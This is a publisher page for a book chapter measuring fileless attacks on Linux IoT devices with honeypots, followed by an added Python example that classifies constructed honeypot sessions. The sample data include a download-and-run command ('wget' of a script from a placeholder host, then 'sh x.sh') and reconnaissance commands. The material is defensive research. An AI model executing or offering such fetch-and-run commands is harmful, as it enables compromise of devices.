
Understanding IoT Security with HoneyCloud

Content Distribution for Mobile Internet: A Cloud-based Approach

Abstract

With their wide adoption, Linux-based IoT devices have emerged as a primary target of today’s cyber-attacks. Traditional malware-based attacks can quickly spread across these devices, but they are well-understood threats with effective defense techniques such as malware fingerprinting and community-based fingerprint sharing. Recently, fileless attacks—attacks that do not rely on malware files—have been increasing on Linux-based IoT devices and pose significant threats to the security and privacy of IoT systems. Little is known about their characteristics and attack vectors, which hinders research and development efforts to defend against them. In this chapter, we present our endeavor to understand fileless attacks on Linux-based IoT devices in the wild. Over a span of twelve months, we deploy 4 hardware IoT honeypots and 108 specially designed software IoT honeypots and successfully attract a wide variety of real-world IoT attacks. We present our measurement study of these attacks, with a focus on fileless attacks, including their prevalence, exploits, environments, and impacts. Our study further leads to multifold insights toward actionable defense strategies that can be adopted by IoT vendors and end users.


Notes

  1. The rest of the connections (i.e., 89.4% of the observed suspicious connections) could not intrude into our honeypots, since they failed to crack the honeypots' passwords.

  2. Unlike previous studies on IoT attacks, in which fileless attacks were scarcely reported, our honeypots captured substantially more fileless attacks with diverse features. We also find that a root cause lies in the weak authentication of today’s IoT devices, which makes it unprecedentedly easy for attackers to obtain remote control and then perform malicious actions without using malware.

  3. For honeypots deployed in public clouds, the situation can be slightly different, since VM instances report diagnostic data (which are of course legitimate) to cloud providers. Fortunately, such traffic is easily recognized, and we do not consider it in our analysis.

  4. A successful login is counted as an effective attack. If any file is downloaded (via wget), it is counted as a malware-based attack. If no file is downloaded but any command is executed, it is counted as a fileless attack.

  5. After we performed port scanning using nmap, Alibaba Cloud blocked our SSH connection from the same machine.

  6. Broadcom and Atheros have made many MIPS SoCs for WiFi routers. Ingenic also provides various MIPS solutions.

  7. There are a number of PowerPC-based set-top boxes and game consoles, such as the Wii and PlayStation.

  8. SPARC-based SoCs have been produced over the years, such as LEON.

  9. https://twitter.com/freebitco/status/923298533972652032.

  10. Since the collected data were encrypted, we did not have direct evidence, but we did observe that the traffic patterns matched well. Note that the SSH tunnel is used for forwarding data and does not involve shell interactions, so we cannot decrypt the data using the Shell Interceptor and Inference Terminal (Sect. 9.2.3.2).
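As an added illustration (not code from the chapter), the session classification rule from note 4 applied to a few constructed honeypot sessions; the Session record, the sample addresses and the extra "login-only" bucket for sessions that ran no command are assumptions of this example, not the chapter's own bookkeeping:

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Session:
    """One honeypot login attempt and, if it succeeded, the commands it ran."""
    src: str                      # source address (constructed, documentation range)
    login_ok: bool                # did the password guess succeed?
    commands: List[str] = field(default_factory=list)


# Constructed sample sessions; these are not data from the chapter.
SAMPLE_SESSIONS = [
    Session("203.0.113.5", False),
    Session("203.0.113.6", False),
    Session("198.51.100.7", True, ["cd /tmp; wget http://example.invalid/x.sh", "sh x.sh"]),
    Session("198.51.100.8", True, ["cat /proc/cpuinfo", "uname -a"]),
    Session("198.51.100.9", True, []),   # logged in but issued no shell command
]


def _programs(command: str) -> List[str]:
    """Return the first word of each simple command in a shell line (split on ; & |)."""
    return [seg.split()[0] for seg in re.split(r"[;&|]+", command) if seg.split()]


def classify(session: Session) -> str:
    """Note 4 rule: login required; any wget => malware-based; else any command => fileless."""
    if not session.login_ok:
        return "failed"                 # password not cracked, so no intrusion (cf. note 1)
    if any("wget" in _programs(cmd) for cmd in session.commands):
        return "malware-based"
    if session.commands:
        return "fileless"
    return "login-only"                 # assumed bucket, e.g. a forwarding-only session


def summarize(sessions: List[Session]) -> Dict[str, float]:
    """Count each class and compute the share of connections that failed to intrude."""
    counts = Counter(classify(s) for s in sessions)
    result: Dict[str, float] = dict(counts)
    result["failed_share"] = counts["failed"] / len(sessions) if sessions else 0.0
    return result


if __name__ == "__main__":
    for s in SAMPLE_SESSIONS:
        print(s.src, classify(s))
    print(summarize(SAMPLE_SESSIONS))
```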



Copyright information

© 2023 The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd.

About this chapter

Cite this chapter

Li, Z., Dai, Y., Chen, G., Liu, Y. (2023). Understanding IoT Security with HoneyCloud. In: Content Distribution for Mobile Internet: A Cloud-based Approach. Springer, Singapore. https://doi.org/10.1007/978-981-19-6982-9_9


  • DOI: https://doi.org/10.1007/978-981-19-6982-9_9


  • Publisher Name: Springer, Singapore

  • Print ISBN: 978-981-19-6981-2

  • Online ISBN: 978-981-19-6982-9
